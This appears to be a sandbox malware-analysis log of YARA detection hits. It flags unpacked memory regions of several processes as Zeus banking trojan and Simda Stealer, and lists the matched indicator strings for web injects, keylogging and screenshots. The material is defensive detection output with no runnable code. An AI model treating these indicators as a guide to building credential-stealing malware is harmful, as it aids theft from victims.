0.2.Bonelessness.exe.406400.0.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49810:$a1: name=%s&port=%u 0x48fa8:$a2: data_inject 0x49198:$a3: keylog.txt 0x48e3d:$a4: User-agent: %s]]] 0x49964:$a5: %s\%02d.bmp
29.2.JbrLYfXaOpqnSngA.exe.32c0000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.33.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
19.2.JbrLYfXaOpqnSngA.exe.2d82000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
13.2.JbrLYfXaOpqnSngA.exe.9a2000.0.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
0.2.Bonelessness.exe.407000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.17.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.44.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
31.2.JbrLYfXaOpqnSngA.exe.8b0000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.2606000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48410:$a1: name=%s&port=%u 0x47ba8:$a2: data_inject 0x47d98:$a3: keylog.txt 0x47a3d:$a4: User-agent: %s]]] 0x48564:$a5: %s\%02d.bmp
39.2.JbrLYfXaOpqnSngA.exe.e42000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.34.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.21.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.2570000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.3c60000.8.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
27.2.JbrLYfXaOpqnSngA.exe.24e0000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
19.2.JbrLYfXaOpqnSngA.exe.2f20000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
6.2.JbrLYfXaOpqnSngA.exe.d52000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
37.2.JbrLYfXaOpqnSngA.exe.2652000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.3c60000.5.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.44.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
5.2.JbrLYfXaOpqnSngA.exe.e42000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
19.2.JbrLYfXaOpqnSngA.exe.2d82000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.28.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.40.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
29.2.JbrLYfXaOpqnSngA.exe.32c0000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
6.2.JbrLYfXaOpqnSngA.exe.2440000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.10.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
21.2.JbrLYfXaOpqnSngA.exe.2440000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.41.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
27.2.JbrLYfXaOpqnSngA.exe.2342000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
8.2.JbrLYfXaOpqnSngA.exe.1282000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.38.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
5.2.JbrLYfXaOpqnSngA.exe.2890000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.15.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.35.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
25.2.JbrLYfXaOpqnSngA.exe.1022000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
35.2.JbrLYfXaOpqnSngA.exe.2e92000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.39.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.2606c00.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
33.2.JbrLYfXaOpqnSngA.exe.2962000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.18.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
0.3.Bonelessness.exe.868460.0.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4d410:$a1: name=%s&port=%u 0x4cba8:$a2: data_inject 0x4cd98:$a3: keylog.txt 0x4ca3d:$a4: User-agent: %s]]] 0x4d564:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.39.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.42.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.30.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
35.2.JbrLYfXaOpqnSngA.exe.2e92000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
25.2.JbrLYfXaOpqnSngA.exe.1022000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.3c60000.8.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.32.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.a00000.45.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.19.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
0.3.Bonelessness.exe.86e060.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.3c60000.6.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.2.svchost.exe.407000.0.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.a00000.45.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.3c60000.7.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.31.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.3a80000.9.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.43.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.2.svchost.exe.400000.1.raw.unpack	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
1.2.svchost.exe.400000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4fc10:$a1: name=%s&port=%u 0x4f3a8:$a2: data_inject 0x4f598:$a3: keylog.txt 0x4f23d:$a4: User-agent: %s]]] 0x4fd64:$a5: %s\%02d.bmp
1.2.svchost.exe.24c2000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.2.svchost.exe.2d20000.5.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.2601000.0.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4d410:$a1: name=%s&port=%u 0x4cba8:$a2: data_inject 0x4cd98:$a3: keylog.txt 0x4ca3d:$a4: User-agent: %s]]] 0x4d564:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.33.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.32.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.3c60000.7.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.2.svchost.exe.2515c00.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
33.2.JbrLYfXaOpqnSngA.exe.2b40000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.2.svchost.exe.2515c00.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.16.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.11.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
21.2.JbrLYfXaOpqnSngA.exe.c22000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.35.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
21.2.JbrLYfXaOpqnSngA.exe.2440000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
27.2.JbrLYfXaOpqnSngA.exe.24e0000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
6.2.JbrLYfXaOpqnSngA.exe.2440000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
35.2.JbrLYfXaOpqnSngA.exe.3290000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
1.3.svchost.exe.39e0000.12.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
1.3.svchost.exe.a00000.46.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
19.2.JbrLYfXaOpqnSngA.exe.2f20000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
